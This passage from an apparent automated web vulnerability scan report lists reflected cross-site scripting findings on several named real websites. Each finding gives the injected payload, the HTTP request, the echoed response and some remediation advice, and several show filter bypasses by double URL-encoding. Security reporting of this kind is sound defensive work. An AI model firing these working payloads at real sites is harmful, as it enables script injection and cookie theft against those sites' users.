Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 20541
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: DidIPLkup=Y; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
Set-Cookie: PORTAL=NEWUSERSITE=&USERSTATEABBR=TX&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=714162536746466581&USERCOUNTRY=US&USERCITY=DALLAS&CookieVersion=2%2E0&PARTNER=HEALTHCAREJOBSITE%2ECOM; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=EE3C17B2%2DB880%2D44F3%2DBF5F%2D90B0921267EE; path=/
Set-Cookie: ASPSESSIONIDSSQARRRA=EFGMBJLDLFLNKMCAFBHGFHHI; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:07:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
Jobsite.com&t_pgid=610711554272457396&t_sn=/common/error/checkurl.asp&t_httph=www.healthcarejobsite.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.healthcarejobsite.com:80/favicon.icoffe89 style=x:expression(alert(1)) 0209854a144&t_sgid=748241823514461389&t_ws=COLO-WEB02&t_ugid=714162536746466581&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.60. http://www.healthiertalk.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthiertalk.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3aad"><script>alert(1)</script>9679a04c57e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3aad"><script>alert(1)</script>9679a04c57e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthiertalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS24200d503af176385808d33f42491be3=30po8icql601pd1jrvvv30b9f4; expires=Thu, 26-May-2011 14:06:09 GMT; path=/; domain=.healthiertalk.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<link rel="canonical" href="http://www.healthiertalk.com/favicon.icoe3aad"><script>alert(1)</script>9679a04c57e" />
...[SNIP]...

6.61. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodpix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 946e9%253balert%25281%2529%252f%252f48748d09025 was submitted in the REST URL parameter 1. This input was echoed as 946e9;alert(1)//48748d09025 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /946e9%253balert%25281%2529%252f%252f48748d09025 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=8p8i2f4pf0io221g8g4em3r5n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 62108


<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<script type='text/javascript'>
                       function blockGalleryNo()
                       {
                           var block = gal_PAGENO.value;
                           F946e9;alert(1)//48748d09025.innerHTML="<b class='galleryBlocked'>
...[SNIP]...

6.62. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodpix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 was submitted in the REST URL parameter 1. This input was echoed as 4dfd3"><script>alert(1)</script>d5516ecf1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=kqk8t1qm2f6p1dtp39jkdcb5i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 87473


<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<input type='hidden' id='gal_PAGENO' value="4dfd3"><script>alert(1)</script>d5516ecf1b4"/>
...[SNIP]...

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f965d<script>alert(1)</script>cfaf1370acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof965d<script>alert(1)</script>cfaf1370acb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
Set-Cookie: JSESSIONID=abcRFn1u9D6k75Nk7x1_s; path=/
Content-Type: text/html
Date: Tue, 03 May 2011 10:20:38 GMT
Content-Length: 13600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<code>/favicon.icof965d<script>alert(1)</script>cfaf1370acb</code>
...[SNIP]...

6.64. http://www.hymnary.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hymnary.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c92d6<script>alert(1)</script>8a2f59a25fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hymnary.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:24:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: SESS7ef49f7ffc66adccad7f6b2cfd02eb5b=76e639fcf89a59fc5d9abe79185bf858; expires=Thu, 02-Jun-2011 11:24:46 GMT; path=/; domain=.hymnary.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:24:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 8447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
...[SNIP]...
<code>/favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd</code>
...[SNIP]...

6.65. http://www.logicbuy.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logicbuy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d073c'%3b61be3f43d3a was submitted in the REST URL parameter 1. This input was echoed as d073c';61be3f43d3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod073c'%3b61be3f43d3a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logicbuy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 59559
Expires: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:32:49 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=e3uhquzqgsrhndqruftqoj45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var loginurl = '/error.aspx?404;http://www.logicbuy.com:80/favicon.icod073c';61be3f43d3a&login=facebook';
</script>
...[SNIP]...

6.66. http://www.makefive.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makefive.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc47d"><script>alert(1)</script>e841b7ed957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobc47d"><script>alert(1)</script>e841b7ed957 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.makefive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:13:17 GMT
Server: Apache/2.2.11 (Ubuntu)
X-Powered-By: PHP/5.2.6-3ubuntu4.2; Qcodo/0.3.43 (Qcodo Beta 3)
Set-Cookie: PHPSESSID=hgs9m6qq5ee30f0it2nt7gf6j0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: userID=0; expires=Tue, 03-May-2011 12:13:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<form method="post" id="shiftCMSPageForm" action="/favicon.icobc47d"><script>alert(1)</script>e841b7ed957">
...[SNIP]...

6.67. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2deb"style%3d"x%3aexpression(alert(1))"57591651e78 was submitted in the REST URL parameter 1. This input was echoed as a2deb"style="x:expression(alert(1))"57591651e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /appa2deb"style%3d"x%3aexpression(alert(1))"57591651e78/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681924
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 1.2729
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp10
Content-Length: 35430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appa2deb"style="x:expression(alert(1))"57591651e78/scripts/ajaxmodules/'+upickemdeals[0][2]+'/">
...[SNIP]...

6.68. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31c7"%3b6118f9ecd9e was submitted in the REST URL parameter 1. This input was echoed as b31c7";6118f9ecd9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appb31c7"%3b6118f9ecd9e/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:02 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7639
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/appb31c7";6118f9ecd9e/scripts/ajaxmodules/'+upickemdeals[0][2]+'/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""

...[SNIP]...

6.69. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the bg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cba3a'%3balert(1)//ea881ebf66b was submitted in the bg parameter. This input was echoed as cba3a';alert(1)//ea881ebf66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eeecba3a'%3balert(1)//ea881ebf66b&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:41:06 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eeecba3a';alert(1)//ea881ebf66b; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.70. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the countColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8fc6'%3balert(1)//110369244fe was submitted in the countColor parameter. This input was echoed as c8fc6';alert(1)//110369244fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(1)//110369244fe&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:36 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
{ float: left; margin-right: 10px; }';
       htmlString += '.upickem-deal-of-the-day dd a { font-weight: bold; color: #000; }';
       htmlString += '.upickem-deal-of-the-day dd.countdown { color: #FF4A00c8fc6';alert(1)//110369244fe; margin-top: 5px; font-weight: bold; }';
       htmlString += '.upickem-deal-of-the-day dd.more-deals { padding-top: 5px; font-size: 11px; }';
       htmlString += '.upickem-deal-of-the-day #upickemSignupForm
...[SNIP]...

6.71. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerBg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953e2'%3balert(1)//e535c35fe5 was submitted in the headerBg parameter. This input was echoed as 953e2';alert(1)//e535c35fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066953e2'%3balert(1)//e535c35fe5&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:15 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5970

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066953e2';alert(1)//e535c35fe5; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066953e2';alert(1)//e535c35fe5; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.72. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e87'%3balert(1)//b5f2410c5a5 was submitted in the headerColor parameter. This input was echoed as 70e87';alert(1)//b5f2410c5a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A0070e87'%3balert(1)//b5f2410c5a5&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:41:32 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
lString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A0070e87';alert(1)//b5f2410c5a5; padding: 0 10px; line-height: 34px; margin: -1px -16px 15px -16px; }';
       htmlString += '.upickem-deal-of-the-day dt img { max-width: 75px; }';
       htmlString += '.upickem-deal-of-the-day dt { float:
...[SNIP]...

6.73. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/scripts/ajaxModules/upickemDeal.php

Issue detail

